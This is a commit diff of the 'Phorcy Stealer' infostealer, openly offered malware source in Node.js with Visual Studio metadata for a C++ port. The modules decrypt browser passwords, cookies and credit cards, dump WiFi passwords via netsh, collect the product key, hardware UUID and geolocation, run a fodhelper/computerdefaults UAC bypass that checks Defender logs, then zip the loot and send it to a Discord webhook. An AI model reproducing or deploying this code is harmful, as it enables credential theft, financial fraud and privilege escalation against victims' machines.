if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const passwordFile = path.join(browserPath, profile, 'Login Data');
if (this.fileExists(passwordFile)) {
try {
this.getKey(localState, async (err, key) => {
if (err) {
console.error(err);
} else {
await this.getPassword(passwordFile, key);
}
});
} catch (err) {
console.error(err);
}
}
const cookieFile = path.join(browserPath, profile, 'Network', 'Cookies');
if (this.fileExists(cookieFile)) {
try {
this.getKey(localState, async (err, key) => {
if (err) {
console.error(err);
} else {
await this.getCookie(cookieFile, key);
}
});
} catch (err) {
console.error(err);
}
}
const ccFile = path.join(browserPath, profile, 'Web Data');
if (this.fileExists(ccFile)) {
try {
this.getKey(localState, async (err, key) => {
if (err) {
console.error(err);
} else {
await this.getCreditCard(ccFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
// history, downloads, bookmark, autofill grabber
fs.writeFileSync(this.historyFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
fs.writeFileSync(this.downloadsFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
fs.writeFileSync(this.bookmarkFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
fs.writeFileSync(this.autofillFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
for (const profile of this.browserProfiles) {
const historyFile = path.join(browserPath, profile, 'History');
if (this.fileExists(historyFile)) {
try {
await this.getHistory(historyFile);
} catch (err) {
console.error(err);
}
}
const downloadsFile = path.join(browserPath, profile, 'History');
if (this.fileExists(downloadsFile)) {
try {
await this.getDownload(downloadsFile);
} catch (err) {
console.error(err);
}
}
const bookmarkFile = path.join(browserPath, profile, 'Bookmarks');
if (this.fileExists(bookmarkFile)) {
try {
await this.getBookmark(bookmarkFile);
} catch (err) {
console.error(err);
}
}
const autofillFile = path.join(browserPath, profile, 'Web Data');
if (this.fileExists(autofillFile)) {
try {
await this.getAutofill(autofillFile);
} catch (err) {
console.error(err);
}
}
}
}
}
}
}
const browserStealer = new BrowserStealing()
browserStealer.Main()
console.log('Hello, World!')

100
main/base/modules/ip-info.js Normal file
View File

@@ -0,0 +1,100 @@
/// coded by syntheticuhh
/// IP-INFO FOR PHORCY STEALER
const axios = require('axios');
/// const config = {
/// webhook: "https://discord.com/api/webhooks/xxxxx/xxxxxxxxx"
/// };
async function getipinfo() {
let ipinfo;
try {
const getreq = await axios.get('https://ipapi.co/json');
const json = getreq.data;
ipinfo = {
ip: json.ip,
network: json.network,
version: json.version,
city: json.city,
region: json.region,
Regcode: json.region_code,
country: json.country,
country_name: json.country_name,
country_code: json.country_code,
capital: json.country_capital,
country_tld: json.country_tld,
continent_code: json.continent_code,
in_eu: json.in_eu,
postal: json.postal,
latitude: json.latitude,
longitude: json.longitude,
timezone: json.timezone,
utc: json.utc_offset,
call_code: json.country_calling_code,
Money: json.currency,
Money_Name: json.currency_name,
language: json.languages,
area: json.country_area,
population: json.country_population,
asn: json.asn,
org: json.org
};
} catch (error) {
console.error('Error: Failed To Connect');
ipinfo = {
ip: 'failed',
network: 'failed',
version: 'failed',
city: 'failed',
region: 'failed',
Regcode: 'failed',
country: 'failed',
country_name: 'failed',
country_code: 'failed',
capital: 'failed',
country_tld: 'failed',
continent_code: 'failed',
in_eu: 'failed',
postal: 'failed',
latitude: 'failed',
longitude: 'failed',
timezone: 'failed',
utc: 'failed',
call_code: 'failed',
Money: 'failed',
Money_Name: 'failed',
language: 'failed',
area: 'failed',
population: 'failed',
asn: 'failed',
org: 'failed'
};
}
const ipembed = {
username: 'IP-INFO // Phorcy Stealer // T.me/Phorcy',
avatar_url: 'https://o.remove.bg/downloads/35158b30-2f72-4dae-8e2f-3513ce002c37/logo-removebg-preview.png',
embeds: [
{
title: 'IP-INFO',
description: 'Import Ip-Info',
color: 0x00008B,
fields: [
{ name: 'IP', value: `\`\`\`${ipinfo.ip}\`\`\`` },
{ name: 'Location', value: `\`\`\`${ipinfo.city}, ${ipinfo.region}, ${ipinfo.country}\`\`\`` },
{ name: 'Coordinates', value: `\`\`\`${ipinfo.latitude}, ${ipinfo.longitude}\`\`\`` },
{ name: 'Timezone', value: `\`\`\`${ipinfo.timezone}\`\`\`` },
{ name: 'Currency', value: `\`\`\`${ipinfo.Money} (${ipinfo.Money_Name})\`\`\`` },
{ name: 'Languages', value: `\`\`\`${ipinfo.language}\`\`\`` },
{ name: 'ASN', value: `\`\`\`${ipinfo.asn}\`\`\`` },
{ name: 'Organization', value: `\`\`\`${ipinfo.org}\`\`\`` },
],
},
],
};
try {
await axios.post(config.webhook, ipembed, { headers: { 'Content-Type': 'application/json' } });
console.log('sent');
} catch (errors) {
console.error('error', errors.message);
}
}
getipinfo();

49
main/base/modules/network.js Normal file
View File

@@ -0,0 +1,49 @@
/// coded by syntheticuhh
/// WIFI-DATA FOR PHORCY STEALER
const util = require('util');
const exec = util.promisify(require('child_process').exec);
const axios = require('axios');
///const config = {
/// webhook: "https://discord.com/api/webhooks/xxxxx/xxxxxxx"
///};
async function getwifinames() {
const { stdout } = await exec('netsh wlan show profiles');
return stdout.split('\n')
.filter(line => line.includes('All User Profile'))
.map(line => line.split(':')[1].trim());
}
async function getwifipass(wifinames) {
const wificreds = [];
for (const wifiname of wifinames) {
const { stdout } = await exec(`netsh wlan show profile name="${wifiname}" key=clear`);
const passwordL = stdout.split('\n').find(line => line.includes('Key Content'));
if (passwordL) {
const password = passwordL.split(':')[1].trim();
wificreds.push({ wifiname, password });
}
}
return wificreds;
}
async function getwificreds() {
const names = await getwifinames();
return await getwifipass(names);
}
async function embedsave(data) {
const wifiembed = {
title: "T.me/Phorcy ~ WIFI-DATA",
color: 0x00008B,
description: "```plaintext\n" +
` =============================================================\n` +
`${data.map(entry => `| User: ${entry.wifiname} ////// Wifi Password: ${entry.password}\n`).join('')}` +
` =============================================================\n` +
"```"
};
await axios.post(config.webhook, { embeds: [wifiembed] });
}
async function getdadata() {
const wificreds = await getwificreds();
await embedsave(wificreds);
console.log('sent');
}
getdadata();

70
main/base/modules/sysinfo.js Normal file
View File

@@ -0,0 +1,70 @@
const si = require('systeminformation');
const fs = require('fs');
const axios = require('axios');
const os = require('os')
const path = require('path')
const { execSync } = require('child_process')
/// const config = {
/// webhook: "https://discord.com/api/webhooks/xxx/xxx"
///};
async function systemInformationFullCopy() {
try {
const resultObject = await si.getAllData();
const jsonResult = JSON.stringify(resultObject, null, 2);
const phorcyPath = `${process.env.LOCALAPPDATA}\\Phorcy`;
fs.mkdir(phorcyPath, (err) => {
if (err && !err.message.includes('EEXIST')) {
} else {
const filePath = `${phorcyPath}\\system_info.json`;
fs.writeFileSync(filePath, jsonResult);
}
});
} catch {}
}
async function systemInformationDump() {
try {
const hostname = os.hostname();
const username = os.userInfo().username;
const uuid = await execSync("wmic csproduct get uuid", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
const product_key = await execSync("wmic path softwarelicensingservice get OA3xOriginalProductKey", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
const device_model = await execSync("wmic csproduct get name", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
const system_environment = await execSync("wmic os get Caption", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
const system_language = await execSync('wmic os get MUILanguages', { stdio: ['inherit', 'pipe'] }).toString().trim().match(/"([^"]*)"/)[1];
const execution_path = path.resolve(__filename);
const sysinfembed = {
username: 'Phorcy Stealer',
avatar_url: 'https://cdn.discordapp.com/attachments/1173375133294002236/1174057935794614433/phorcy.jpg',
embeds: [
{
title: `System, Victim:${uuid}`,
description: 'System Information Captured.',
color: 0x0013de,
footer: {
text: 't.me/phorcy',
},
fields: [
{ name: 'Hostname', value: `\`\`\`${hostname}\`\`\``, inline: false },
{ name: 'Username', value: `\`\`\`${username}\`\`\``, inline: false },
{ name: 'UUID', value: `\`\`\`${uuid}\`\`\``, inline: false },
{ name: 'Product Key', value: `\`\`\`${product_key}\`\`\``, inline: false },
{ name: 'Device Model', value: `\`\`\`${device_model}\`\`\``, inline: false },
{ name: 'System Environment', value: `\`\`\`${system_environment}\`\`\``, inline: false },
{ name: 'System Language', value: `\`\`\`${system_language}\`\`\``, inline: false },
{ name: 'Execution Path', value: `\`\`\`${execution_path}\`\`\``, inline: false },
],
},
],
};
await axios.post(config.webhook, sysinfembed, { headers: { 'Content-Type': 'application/json' } });
} catch {}
}
// systemInformationFullCopy();
systemInformationDump();
console.log('Hello, World!')

56
main/base/modules/uac_bypass.js Normal file
View File

@@ -0,0 +1,56 @@
const { execSync } = require('child_process');
const os = require('os');
function UACbypass(method = 1) {
const execute = (cmd) => execSync(cmd, { shell: true, stdio: 'pipe' }).toString();
if (GetSelf()[1]) {
if (method === 1 || method === 2) {
const executable = process.execPath.replace(/\\/g, '\\\\');
execute(`reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /d "${executable}" /f`);
execute('reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /v "DelegateExecute" /f');
const logCountBefore = execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').split('\n').length;
if (method === 1) {
execute('computerdefaults --nouacbypass');
} else if (method === 2) {
execute('fodhelper --nouacbypass');
}
const logCountAfter = execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').split('\n').length;
execute('reg delete hkcu\\Software\\Classes\\ms-settings /f');
if (logCountAfter > logCountBefore) {
return UACbypass(method + 1);
}
} else {
return false;
}
return true;
}
}
function IsAdmin() {
return os.userInfo().username === 'Administrator';
}
function GetSelf() {
if (process.pkg) {
return [process.execPath, true];
} else {
return [__filename, false];
}
}
if (require.main === module) {
if (IsAdmin()) {
console.log("Already running with admin privileges.");
} else {
console.log("Running without admin privileges. Trying to bypass UAC...");
const bypassSuccessful = UACbypass();
if (bypassSuccessful) {
console.log("UAC bypass successful.");
} else {
console.log("UAC bypass unsuccessful.");
}
}
}

50
main/base/modules/zipped.js Normal file
View File

@@ -0,0 +1,50 @@
const fs = require('fs');
const archiver = require('archiver');
const axios = require('axios');
const FormData = require('form-data');
const config = {
webhook: ""
}
function genrandomstr(length) {
const letter = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
let answer = '';
for (let i = 0; i < length; i++) {
answer += letter.charAt(Math.floor(Math.random() * letter.length));
}
return answer;
}
function cfold() {
const randomstr = genrandomstr(7);
const main = `PHORCY-DATA-${randomstr}`;
const sub = ['Discord', 'Browsers', 'System', 'Socials', 'Wallets'];
fs.mkdirSync(main);
sub.forEach(subfolder => {
fs.mkdirSync(`${main}/${subfolder}`);
});
return main;
}
async function zipped(main) {
const zipfile = `${main}.zip`;
const output123 = fs.createWriteStream(zipfile);
const archive = archiver('zip', {
zlib: { level: 9 }
});
output123.on('close', async () => {
const form123 = new FormData();
form123.append('file', fs.createReadStream(zipfile));
await axios.post(config.webhook, form123, {
headers: {
...form123.getHeaders(),
}
});
});
archive.pipe(output123);
archive.directory(main, false);
archive.finalize();
}
const main = cfold();
zipped(main);

BIN
main/port/payload/phorcy/.vs/nnn/FileContentIndex/8a88572f-73e7-47da-9b4d-3ebe09a598ad.vsidx Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/nnn/v17/.suo Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/nnn/v17/Browse.VC.db Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/phorcy-master/FileContentIndex/814d93ab-9e62-4ef4-8928-42fae8b5a041.vsidx Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/phorcy-master/FileContentIndex/89eb7fbe-37b9-40c1-b2a0-51c79365c3eb.vsidx Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/phorcy-master/FileContentIndex/8bbf4fdc-f439-46d2-add9-a9d258bc7df7.vsidx Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/phorcy-master/FileContentIndex/edfd86c8-d3c7-4adb-a5b9-e48b1fb98577.vsidx Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/phorcy-master/FileContentIndex/f9177de2-1aa8-4643-8fac-b0355926e3f3.vsidx Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/phorcy-master/v17/.suo Normal file
View File

Binary file not shown.

BIN
main/port/payload/phorcy/.vs/phorcy-master/v17/Browse.VC.db Normal file
View File

Binary file not shown.

258
main/port/payload/phorcy/.vs/phorcy-master/v17/DocumentLayout.json Normal file
View File

@@ -0,0 +1,258 @@
{
"Version": 1,
"WorkspaceRootPath": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\",
"Documents": [
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\ip.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\utils\\ip.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\utils.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\utils\\utils.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\conf.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\anti_dbg\\win\\exploitation\\conf.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\conf.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\conf.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\include.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\include.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\main.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\main.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\shell\\shell.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\chromium.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\chromium.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\gecko.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\gecko.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\browser.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
},
{
"AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
"RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\browser.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
}
],
"DocumentGroupContainers": [
{
"Orientation": 0,
"VerticalTabListWidth": 256,
"DocumentGroups": [
{
"DockedWidth": 200,
"SelectedChildIndex": 0,
"Children": [
{
"$type": "Document",
"DocumentIndex": 0,
"Title": "ip.cpp",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\ip.cpp",
"RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\utils\\ip.cpp",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\ip.cpp",
"RelativeToolTip": "phorcy-master\\windows\\exfil\\utils\\ip.cpp",
"ViewState": "AgIAAAAAAAAAAAAAAAAAABwAAAAVAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
"WhenOpened": "2026-02-01T02:22:32.799Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 1,
"Title": "utils.h",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\utils.h",
"RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\utils\\utils.h",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\utils.h",
"RelativeToolTip": "phorcy-master\\windows\\exfil\\utils\\utils.h",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
"WhenOpened": "2026-02-01T02:22:26.132Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 2,
"Title": "conf.h",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\conf.h",
"RelativeDocumentMoniker": "phorcy-master\\anti_dbg\\win\\exploitation\\conf.h",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\conf.h",
"RelativeToolTip": "phorcy-master\\anti_dbg\\win\\exploitation\\conf.h",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
"WhenOpened": "2026-02-01T02:12:53.327Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 3,
"Title": "conf.cpp",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\conf.cpp",
"RelativeDocumentMoniker": "phorcy-master\\conf.cpp",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\conf.cpp",
"RelativeToolTip": "phorcy-master\\conf.cpp",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
"WhenOpened": "2026-02-01T02:12:36.33Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 4,
"Title": "include.h",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\include.h",
"RelativeDocumentMoniker": "phorcy-master\\include.h",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\include.h",
"RelativeToolTip": "phorcy-master\\include.h",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
"WhenOpened": "2026-02-01T02:12:32.636Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 5,
"Title": "main.cpp",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\main.cpp",
"RelativeDocumentMoniker": "phorcy-master\\main.cpp",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\main.cpp",
"RelativeToolTip": "phorcy-master\\main.cpp",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
"WhenOpened": "2026-02-01T02:12:03.519Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 7,
"Title": "exploitation.h",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h",
"RelativeDocumentMoniker": "phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h",
"RelativeToolTip": "phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
"WhenOpened": "2026-02-01T02:11:59.206Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 6,
"Title": "user_account_control.cpp",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp",
"RelativeDocumentMoniker": "phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp",
"RelativeToolTip": "phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
"WhenOpened": "2026-02-01T02:11:47.589Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 8,
"Title": "shell.h",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.h",
"RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\shell\\shell.h",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.h",
"RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\shell\\shell.h",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
"WhenOpened": "2026-02-01T02:10:54.014Z",
"EditorCaption": ""
},
{
"$type": "Document",
"DocumentIndex": 9,
"Title": "shell.cpp",
"DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp",
"RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp",
"ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp",
"RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp",
"ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
"WhenOpened": "2026-02-01T02:10:34.306Z",
"EditorCaption": ""
},
{
"$type": "Document",
